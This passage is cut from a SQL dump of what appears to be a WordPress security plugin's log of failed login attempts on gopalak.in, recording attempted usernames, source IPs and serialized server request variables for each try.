14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847557.7234111;s:12:\"REQUEST_TIME\";i:1746847557;}}','35.154.1.88',1,'2025-05-10 08:55:59','2025-05-11 10:08:13'),(95229,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61943\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847557.722548;s:12:\"REQUEST_TIME\";i:1746847557;}}','35.154.1.88',1,'2025-05-10 08:55:59','2025-05-11 10:08:13'),(95230,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61937\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847558.676291;s:12:\"REQUEST_TIME\";i:1746847558;}}','35.154.1.88',1,'2025-05-10 08:56:00','2025-05-11 10:08:13'),(95231,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59954\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.20\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746847678.107023;s:12:\"REQUEST_TIME\";i:1746847678;}}','69.57.162.20',0,'2025-05-10 08:57:59','1970-01-01 00:00:00'),(95232,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51118\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848284.3409591;s:12:\"REQUEST_TIME\";i:1746848284;}}','35.154.1.88',1,'2025-05-10 09:08:07','2025-05-11 10:08:13'),(95233,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51117\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848284.3416071;s:12:\"REQUEST_TIME\";i:1746848284;}}','35.154.1.88',1,'2025-05-10 09:08:07','2025-05-11 10:08:13'),(95234,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51120\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848286.168874;s:12:\"REQUEST_TIME\";i:1746848286;}}','35.154.1.88',1,'2025-05-10 09:08:07','2025-05-11 10:08:13'),(95235,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51119\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848286.1694839;s:12:\"REQUEST_TIME\";i:1746848286;}}','35.154.1.88',1,'2025-05-10 09:08:07','2025-05-11 10:08:13'),(95236,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51121\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848287.070662;s:12:\"REQUEST_TIME\";i:1746848287;}}','35.154.1.88',1,'2025-05-10 09:08:08','2025-05-11 10:08:13'),(95237,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48480\";s:11:\"REMOTE_ADDR\";s:14:\"107.172.243.11\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848288.9165511;s:12:\"REQUEST_TIME\";i:1746848288;}}','107.172.243.11',0,'2025-05-10 09:08:10','1970-01-01 00:00:00'),(95238,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45064\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.151\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746848894.779423;s:12:\"REQUEST_TIME\";i:1746848894;}}','67.223.118.151',0,'2025-05-10 09:18:16','1970-01-01 00:00:00'),(95239,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56451\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746849013.8724539;s:12:\"REQUEST_TIME\";i:1746849013;}}','35.154.1.88',1,'2025-05-10 09:20:16','2025-05-11 10:08:13'),(95240,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 